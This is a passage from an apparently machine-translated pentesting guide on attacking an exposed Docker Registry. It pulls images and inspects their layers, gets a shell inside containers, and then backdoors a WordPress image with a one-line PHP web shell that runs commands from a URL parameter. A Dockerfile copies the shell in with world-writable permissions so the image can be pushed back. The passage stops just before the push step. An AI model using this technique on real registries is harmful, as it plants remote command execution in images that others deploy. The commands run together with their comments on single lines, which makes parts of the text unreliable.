注意 that when you download and decompress the blobs files and folders will appear in the current directory. If you download all the blobs and decompress them in the same folder they will overwrite values from the previously decompressed blobs, so be careful. It may be interesting to decompress each blob inside a different folder to inspect the exact content of each blob.
信息收集 using docker
#Once you know which images the server is saving (/v2/_catalog) you can pull themdocker pull 10.10.10.10:5000/ubuntu
#Check the commands used to create the layers of the imagedocker history 10.10.10.10:5000/ubuntu
#IMAGE CREATED CREATED BY SIZE COMMENT#ed05bef01522 2 years ago ./run.sh 46.8MB#<missing> 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B#<missing> 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B#<missing> 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B#<missing> 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB#Run and get a shelldocker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell runningdocker ps #Using a different shelldocker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
Backdooring WordPress image
In the scenario where you have found a Docker Registry saving a wordpress image you can backdoor it. Create the backdoor:
<?phpechoshell_exec($_GET["cmd"]); ?>
Create a Dockerfile:
FROM 10.10.10.10:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
Create the new image, check it’s created, and push it: